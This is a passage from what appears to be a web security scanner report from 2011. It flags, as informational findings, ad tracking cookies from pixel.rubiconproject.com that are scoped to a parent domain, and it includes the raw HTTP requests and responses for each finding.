rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C%265671%3D14742%2C0%2C1%2C%2C%264212%3D14742%2C0%2C1%2C%2C%267935%3D14742%2C0%2C1%2C%2C%266073%3D14742%2C0%2C1%2C%2C; put_2100=usr3fe3ac8db403a568; rdk=7856/12590; rdk2=0; ses2=12338^3&12590^1; csi2=3196945.js^1^1315404874^1315404874&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; cd=false; au=GSAE3LG5-KKTN-10.208.77.156; lm="7 Sep 2011 14:14:35 GMT"

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%265852%3D1%267727%3D1; expires=Fri, 07-Oct-2011 14:15:00 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C%265671%3D14742%2C0%2C1%2C%2C%267727%3D14742%2C0%2C1%2C%2C%264212%3D14742%2C0%2C1%2C%2C%267935%3D14742%2C0%2C1%2C%2C%266073%3D14742%2C0%2C1%2C%2C%265852%3D14742%2C0%2C1%2C%2C; expires=Fri, 07-Oct-2011 14:15:00 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; expires=Fri, 07-Oct-2011 14:15:00 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

8.38. http://pixel.rubiconproject.com/tap.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/tap.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264554%3D1; expires=Fri, 07-Oct-2011 14:14:17 GMT; path=/; domain=.rubiconproject.com
put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; expires=Mon, 05-Mar-2012 14:14:17 GMT; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=4554&nid=1430&put=f0be7f74-7052-4a09-8aa0-ca59d82b3888&expires=180 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=7725/12338
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1%266432%3D1; rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C0%2C1%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk2=0; ses2=12338^1; csi2=3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; csi15=3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; rdk=7856/12590; rdk15=0; ses15=12338^1&12590^1

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:17 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264554%3D1; expires=Fri, 07-Oct-2011 14:14:17 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C0%2C1%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C%265671%3D14742%2C0%2C2%2C%2C%264554%3D14742%2C0%2C1%2C%2C; expires=Fri, 07-Oct-2011 14:14:17 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; expires=Mon, 05-Mar-2012 14:14:17 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

8.39. http://pixel.rubiconproject.com/tap.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/tap.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266286%3D1; expires=Fri, 07-Oct-2011 14:14:25 GMT; path=/; domain=.rubiconproject.com
put_2132=439524AE8C6B634E021F5F7802166020; expires=Thu, 06-Sep-2012 14:14:25 GMT; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=6286&nid=2132&put=439524AE8C6B634E021F5F7802166020&expires=365 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=7856/12590
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=12338^1; csi2=3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; put_2081=OO-00000000000000000; csi15=3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rdk=7856/12590; rdk15=0; ses15=12338^2&12590^2; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1; rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C%265671%3D14742%2C0%2C1%2C%2C%264212%3D14742%2C0%2C1%2C%2C; put_1185=2863298321806118365

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:25 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266286%3D1; expires=Fri, 07-Oct-2011 14:14:25 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C%265671%3D14742%2C0%2C1%2C%2C%264212%3D14742%2C0%2C1%2C%2C%267935%3D14742%2C0%2C1%2C%2C%266286%3D14742%2C0%2C1%2C%2C; expires=Fri, 07-Oct-2011 14:14:25 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_2132=439524AE8C6B634E021F5F7802166020; expires=Thu, 06-Sep-2012 14:14:25 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

8.40. http://pixel.rubiconproject.com/tap.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/tap.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%262874c0bb165b2b12e25b9caf%3D1%262874c0bb2d7a602682976bca%3D1%2660732874c0bbd63f3fd660e8a1bd%3D1%266073%3D1%265852%3D1; expires=Fri, 07-Oct-2011 14:15:03 GMT; path=/; domain=.rubiconproject.com
put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; expires=Fri, 07-Oct-2011 14:15:03 GMT; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=5852&nid=2101&put=f31d0c43-cd91-4caf-ae01-86754c3f8535 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://pixel.invitemedia.com/rubicon_sync?publisher_user_id=f772ba986ce1d14ae944dfcb2540fa9b434bfac6&publisher_dsp_id=2101&publisher_call_type=iframe&publisher_redirecturl=http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; rdk2=1; ses2=12338^3&12590^1; csi2=3151648.js^1^1315404875^1315404875&3196945.js^1^1315404874^1315404874&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; rdk=7725/12338; rdk15=0; ses15=12338^3&12590^2; csi15=3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1; rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C%265671%3D14742%2C0%2C1%2C%2C%264212%3D14742%2C0%2C1%2C%2C%267935%3D14742%2C0%2C1%2C%2C%266073%3D14742%2C0%2C1%2C%2C%267727%3D14742%2C0%2C1%2C%2C; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; cd=false; lm="7 Sep 2011 14:14:36 GMT"

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:03 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%262874c0bb165b2b12e25b9caf%3D1%262874c0bb2d7a602682976bca%3D1%2660732874c0bbd63f3fd660e8a1bd%3D1%266073%3D1%265852%3D1; expires=Fri, 07-Oct-2011 14:15:03 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C%265671%3D14742%2C0%2C1%2C%2C%262874c0bb165b2b12e25b9caf%3D14742%2C0%2C1%2C%2C%266073%3D14742%2C0%2C23%2C%2C%262874c0bb2d7a602682976bca%3D14742%2C0%2C1%2C%2C%2660732874c0bbd63f3fd660e8a1bd%3D14742%2C0%2C1%2C%2C%265852%3D14742%2C0%2C1%2C%2C; expires=Fri, 07-Oct-2011 14:15:03 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; expires=Fri, 07-Oct-2011 14:15:03 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

8.41. http://pixel.rubiconproject.com/tap.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/tap.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1; expires=Fri, 07-Oct-2011 14:14:25 GMT; path=/; domain=.rubiconproject.com
put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; expires=Fri, 07-Oct-2011 14:14:25 GMT; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=7935&nid=2271&expires=30&put=DUSYkUQpjy1LEYeYEnMS6srZRiE HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=7856/12590
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=12338^1; csi2=3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; put_2081=OO-00000000000000000; csi15=3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rdk=7856/12590; rdk15=0; ses15=12338^2&12590^2; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1; rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C%265671%3D14742%2C0%2C1%2C%2C%264212%3D14742%2C0%2C1%2C%2C; put_1185=2863298321806118365

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:25 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1; expires=Fri, 07-Oct-2011 14:14:25 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C%265671%3D14742%2C0%2C1%2C%2C%264212%3D14742%2C0%2C1%2C%2C%267935%3D14742%2C0%2C2%2C%2C; expires=Fri, 07-Oct-2011 14:14:25 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; expires=Fri, 07-Oct-2011 14:14:25 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

8.42. http://pixel.rubiconproject.com/tap.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/tap.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1; expires=Fri, 07-Oct-2011 14:14:15 GMT; path=/; domain=.rubiconproject.com
put_2081=OO-00000000000000000; expires=Fri, 07-Oct-2011 14:14:15 GMT; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=5671&nid=2081&put=OO-00000000000000000&expires=30 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=7725/12338
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1%266432%3D1; rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C0%2C1%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk2=0; ses2=12338^1; csi2=3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; rdk=7725/12338; rdk15=0; ses15=12338^1; csi15=3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:15 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1; expires=Fri, 07-Oct-2011 14:14:15 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C0%2C1%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C%265671%3D14742%2C0%2C2%2C%2C; expires=Fri, 07-Oct-2011 14:14:15 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_2081=OO-00000000000000000; expires=Fri, 07-Oct-2011 14:14:15 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

8.43. http://pixel.rubiconproject.com/tap.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/tap.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%262874c0bb165b2b12e25b9caf%3D1%266073%3D1; expires=Fri, 07-Oct-2011 14:14:35 GMT; path=/; domain=.rubiconproject.com
put_2100=usr3fe3ac8db403a568; expires=Fri, 07-Oct-2011 14:14:35 GMT; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=6073&nid=2100&expires=30&put=usr3fe3ac8db403a568 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=7725/12338
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; csi2=3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; put_2081=OO-00000000000000000; csi15=3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rdk15=0; ses15=12338^2&12590^2; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1; rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C%265671%3D14742%2C0%2C1%2C%2C%264212%3D14742%2C0%2C1%2C%2C%267935%3D14742%2C0%2C1%2C%2C; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; rdk=7725/12338; rdk2=0; ses2=12338^2

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:35 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%262874c0bb165b2b12e25b9caf%3D1%266073%3D1; expires=Fri, 07-Oct-2011 14:14:35 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C0%2C1%2C%2C%265671%3D14742%2C0%2C1%2C%2C%262874c0bb165b2b12e25b9caf%3D14742%2C0%2C1%2C%2C%266073%3D14742%2C0%2C1%2C%2C; expires=Fri, 07-Oct-2011 14:14:35 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_2100=usr3fe3ac8db403a568; expires=Fri, 07-Oct-2011 14:14:35 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

